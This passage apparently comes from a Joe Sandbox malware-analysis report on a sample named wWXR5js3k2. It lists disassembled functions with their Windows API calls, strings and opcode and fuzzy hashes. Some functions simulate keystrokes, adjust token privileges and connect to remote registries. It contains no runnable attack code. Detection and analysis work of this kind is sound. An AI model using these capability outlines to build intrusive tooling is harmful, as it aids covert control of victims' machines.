                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$@U=u$F$hW$pbq
                                                    • API String ID: 3977979337-816998740
                                                    • Opcode ID: 513cf09eb43c6d8b580535ba0dd5ef405c5c670e5c5cb6839769f8dd8e66ae84
                                                    • Instruction ID: 2a520e307d7ebbb46f34b50c3774618ae67cca07ad9be2e60b3f37a0db9ccb6e
                                                    • Opcode Fuzzy Hash: 513cf09eb43c6d8b580535ba0dd5ef405c5c670e5c5cb6839769f8dd8e66ae84
                                                    • Instruction Fuzzy Hash: 1942BC34A04246EFD724DF28C855EAABBE6FF49320F14452EF696873A0C731D845DB52
                                                    Function 00666F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memset
                                                    • String ID: ]p$3cf$DEFINE$P\p$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_f
                                                    • API String ID: 1357608183-3667214126
                                                    • Opcode ID: 5538ba64af562bc9612e9bd93b575b419457f5e2ed16bb24b1185a8b84bb7a3c
                                                    • Instruction ID: c2c43d153684dde6909e2df395620043fd685022df39272e94024c89e5a49ab3
                                                    • Opcode Fuzzy Hash: 5538ba64af562bc9612e9bd93b575b419457f5e2ed16bb24b1185a8b84bb7a3c
                                                    • Instruction Fuzzy Hash: 62938171A40216DBDB24DF58C891BEDB7B2FF49314F24816AE945AB381E7709E82CF50
                                                    Function 006548D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,?), ref: 006548DF
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0068D665
                                                    • IsIconic.USER32(?), ref: 0068D66E
                                                    • ShowWindow.USER32(?,00000009), ref: 0068D67B
                                                    • SetForegroundWindow.USER32(?), ref: 0068D685
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068D69B
                                                    • GetCurrentThreadId.KERNEL32 ref: 0068D6A2
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0068D6AE
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068D6BF
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068D6C7
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0068D6CF
                                                    • SetForegroundWindow.USER32(?), ref: 0068D6D2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D6E7
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D6F2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D6FC
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D701
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D70A
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D70F
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D719
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D71E
                                                    • SetForegroundWindow.USER32(?), ref: 0068D721
                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0068D748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: b59e8af75762f9fe2d23fb2f4699ae4cf22372fb160a652124e8162ccad44891
                                                    • Instruction ID: 5afaa193d60d4ba910c72c86161a289cc772d62458604409269c2b787dbf4dc0
                                                    • Opcode Fuzzy Hash: b59e8af75762f9fe2d23fb2f4699ae4cf22372fb160a652124e8162ccad44891
                                                    • Instruction Fuzzy Hash: 24319371A41318BAEB202B619C49FBF3F6EEB44B50F104066FA05EA1D1CAB05941ABA0
                                                    Function 006A8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
                                                      • Part of subcall function 006A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
                                                      • Part of subcall function 006A87E1: GetLastError.KERNEL32 ref: 006A8865
                                                    • _memset.LIBCMT ref: 006A8353
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006A83A5
                                                    • CloseHandle.KERNEL32(?), ref: 006A83B6
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006A83CD
                                                    • GetProcessWindowStation.USER32 ref: 006A83E6
                                                    • SetProcessWindowStation.USER32(00000000), ref: 006A83F0
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006A840A
                                                      • Part of subcall function 006A81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006A8309), ref: 006A81E0
                                                      • Part of subcall function 006A81CB: CloseHandle.KERNEL32(?,?,006A8309), ref: 006A81F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 5a6ebe52326eae971557cdd18fb53b4369a18a30c8067e700f6d3c515f31dc40
                                                    • Instruction ID: 2022a32b1890fef311f30f57d58ee3ad8a74d9961e30bfcd064f235eb4885217
                                                    • Opcode Fuzzy Hash: 5a6ebe52326eae971557cdd18fb53b4369a18a30c8067e700f6d3c515f31dc40
                                                    • Instruction Fuzzy Hash: 528158B1D01249AFDF51AFA4CC45AEEBBBAEF05304F14816AF815A3261DB319E14DF20
                                                    Function 006BC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006BC78D
                                                    • FindClose.KERNEL32(00000000), ref: 006BC7E1
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006BC806
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006BC81D
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 006BC844
                                                    • __swprintf.LIBCMT ref: 006BC890
                                                    • __swprintf.LIBCMT ref: 006BC8D3
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • __swprintf.LIBCMT ref: 006BC927
                                                      • Part of subcall function 00673698: __woutput_l.LIBCMT ref: 006736F1
                                                    • __swprintf.LIBCMT ref: 006BC975
                                                      • Part of subcall function 00673698: __flsbuf.LIBCMT ref: 00673713
                                                      • Part of subcall function 00673698: __flsbuf.LIBCMT ref: 0067372B
                                                    • __swprintf.LIBCMT ref: 006BC9C4
                                                    • __swprintf.LIBCMT ref: 006BCA13
                                                    • __swprintf.LIBCMT ref: 006BCA62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: 88a31c967b7c4051f2ff0fe57707b9adf664920d9dd994d1b4f609054d782735
                                                    • Instruction ID: 3019fd18110c981ea5d2b787ce4378574b1edd23b9c9dcdd35796b9b6455c3ef
                                                    • Opcode Fuzzy Hash: 88a31c967b7c4051f2ff0fe57707b9adf664920d9dd994d1b4f609054d782735
                                                    • Instruction Fuzzy Hash: BEA13EB1404345ABC740EFA4C886DAFB7EEBF94701F40491EF99586291EB34DA48CB66
                                                    Function 006BEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 006BEFB6
                                                    • _wcscmp.LIBCMT ref: 006BEFCB
                                                    • _wcscmp.LIBCMT ref: 006BEFE2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 006BEFF4
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 006BF00E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006BF026
                                                    • FindClose.KERNEL32(00000000), ref: 006BF031
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006BF04D
                                                    • _wcscmp.LIBCMT ref: 006BF074
                                                    • _wcscmp.LIBCMT ref: 006BF08B
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BF09D
                                                    • SetCurrentDirectoryW.KERNEL32(00708920), ref: 006BF0BB
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006BF0C5
                                                    • FindClose.KERNEL32(00000000), ref: 006BF0D2
                                                    • FindClose.KERNEL32(00000000), ref: 006BF0E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: e53cdabd49397056a4244269ddc94b863d4079e6ae19ff2f3b870f765b4f0d22
                                                    • Instruction ID: 8efa955a30a0a97cf532fa087b58c0784474f82c10087da9c171c16ff6a55212
                                                    • Opcode Fuzzy Hash: e53cdabd49397056a4244269ddc94b863d4079e6ae19ff2f3b870f765b4f0d22
                                                    • Instruction Fuzzy Hash: 633113729012196ADB10EFB4DC58AEE77AE9F48320F044176E845E22B1DB70DE80CB65
                                                    Function 006D0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D0953
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,006DF910,00000000,?,00000000,?,?), ref: 006D09C1
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006D0A09
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006D0A92
                                                    • RegCloseKey.ADVAPI32(?), ref: 006D0DB2
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D0DBF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: a62f78d03bf7643921a6c6f131a460d55d2b9122952c9d4cd5b80e85e233aca7
                                                    • Instruction ID: 4a094273d5c976e126b5530d5ea52db9430cf161286acce921f6c88375a3b467
                                                    • Opcode Fuzzy Hash: a62f78d03bf7643921a6c6f131a460d55d2b9122952c9d4cd5b80e85e233aca7
                                                    • Instruction Fuzzy Hash: 7E0269756006019FDB54EF24C851E6AB7E6FF89314F04895EF88A9B3A2CB30ED05CB95
                                                    Function 006666E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0Do$0Eo$0Fo$3cf$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGo$_f
                                                    • API String ID: 0-4072837325
                                                    • Opcode ID: c65a8801d927344b6a658d3f5518162fc5d094e169b7715d7e9d654542bc8813
                                                    • Instruction ID: 9772ce2c579fb146f0051bab540c6dcb113fb999d88454cfe58a623b6b1ff80e
                                                    • Opcode Fuzzy Hash: c65a8801d927344b6a658d3f5518162fc5d094e169b7715d7e9d654542bc8813
                                                    • Instruction Fuzzy Hash: AE725D75E00219DBDB14DF59D8807EEB7B6EF4A310F14816AE905EB291EB349E81CF90
                                                    Function 006BF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 006BF113
                                                    • _wcscmp.LIBCMT ref: 006BF128
                                                    • _wcscmp.LIBCMT ref: 006BF13F
                                                      • Part of subcall function 006B4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006B43A0
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006BF16E
                                                    • FindClose.KERNEL32(00000000), ref: 006BF179
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006BF195
                                                    • _wcscmp.LIBCMT ref: 006BF1BC
                                                    • _wcscmp.LIBCMT ref: 006BF1D3
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BF1E5
                                                    • SetCurrentDirectoryW.KERNEL32(00708920), ref: 006BF203
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006BF20D
                                                    • FindClose.KERNEL32(00000000), ref: 006BF21A
                                                    • FindClose.KERNEL32(00000000), ref: 006BF22C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: 6fea2ac5f5bf2edd046d9220385ef54f84956935a5ac31f05742b57046af3050
                                                    • Instruction ID: 932677a3d7449786cab04d2ed06e8509c631ed56b927783d30ff4cc405ef11b5
                                                    • Opcode Fuzzy Hash: 6fea2ac5f5bf2edd046d9220385ef54f84956935a5ac31f05742b57046af3050
                                                    • Instruction Fuzzy Hash: 53310776901219BADB10AFB4EC59AEE77AE9F45320F104276E844E22B0DB31DF85CB54
                                                    Function 006BA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006BA20F
                                                    • __swprintf.LIBCMT ref: 006BA231
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 006BA26E
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006BA293
                                                    • _memset.LIBCMT ref: 006BA2B2
                                                    • _wcsncpy.LIBCMT ref: 006BA2EE
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006BA323
                                                    • CloseHandle.KERNEL32(00000000), ref: 006BA32E
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 006BA337
                                                    • CloseHandle.KERNEL32(00000000), ref: 006BA341
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: 3d7351a0459d1065f1e3ad794345babb4e254933100217495a4b7285ca7b5019
                                                    • Instruction ID: b4fe692e188aa13eb29ab7dbb7fce9cb9d16dfebcbf8ca7d981b5598d0856158
                                                    • Opcode Fuzzy Hash: 3d7351a0459d1065f1e3ad794345babb4e254933100217495a4b7285ca7b5019
                                                    • Instruction Fuzzy Hash: 2731E6B1900109ABDB20DFA0DC49FEB37BEEF89700F1041B6F509D2260EB7197848B65
                                                    Function 006B001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 006B0097
                                                    • SetKeyboardState.USER32(?), ref: 006B0102
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 006B0122
                                                    • GetKeyState.USER32(000000A0), ref: 006B0139
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 006B0168
                                                    • GetKeyState.USER32(000000A1), ref: 006B0179
                                                    • GetAsyncKeyState.USER32(00000011), ref: 006B01A5
                                                    • GetKeyState.USER32(00000011), ref: 006B01B3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 006B01DC
                                                    • GetKeyState.USER32(00000012), ref: 006B01EA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 006B0213
                                                    • GetKeyState.USER32(0000005B), ref: 006B0221
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 1f825c6c13f3afed44a47d434fd66c067a877f8b84a4f9abb5a89193243c6233
                                                    • Instruction ID: 7d99ee834c5db7bd080b95056d7c06ca9c2194a2ae877fa53b7418203bbd4ad4
                                                    • Opcode Fuzzy Hash: 1f825c6c13f3afed44a47d434fd66c067a877f8b84a4f9abb5a89193243c6233
                                                    • Instruction Fuzzy Hash: AE51ECB090478829FB35EBA488547EBBFB69F11380F08459ED5C2572C2DA649BCCC761
                                                    Function 006D03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D04AC
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006D054B
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006D05E3
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006D0822
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D082F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: 206e5bc81eb4958f073fd712853334fb232a4dd204fc0a40d10b57572ac083b1
                                                    • Instruction ID: b2edfb926cbf298a66f83154d22f2f9a82878dc94c0b9fb6b79e244854ccf07d
                                                    • Opcode Fuzzy Hash: 206e5bc81eb4958f073fd712853334fb232a4dd204fc0a40d10b57572ac083b1
                                                    • Instruction Fuzzy Hash: 42E14F71604200EFDB54DF24C895E6ABBE6EF89314F04896EF84ADB361D631ED05CB92
                                                    Function 006C83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • CoInitialize.OLE32 ref: 006C8403
                                                    • CoUninitialize.OLE32 ref: 006C840E
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,006E2BEC,?), ref: 006C846E
                                                    • IIDFromString.OLE32(?,?), ref: 006C84E1
                                                    • VariantInit.OLEAUT32(?), ref: 006C857B
                                                    • VariantClear.OLEAUT32(?), ref: 006C85DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 0c0fb41be119c0e5ffa04f8587cc3f67b6e073da4818846d0566cec115c1b4db
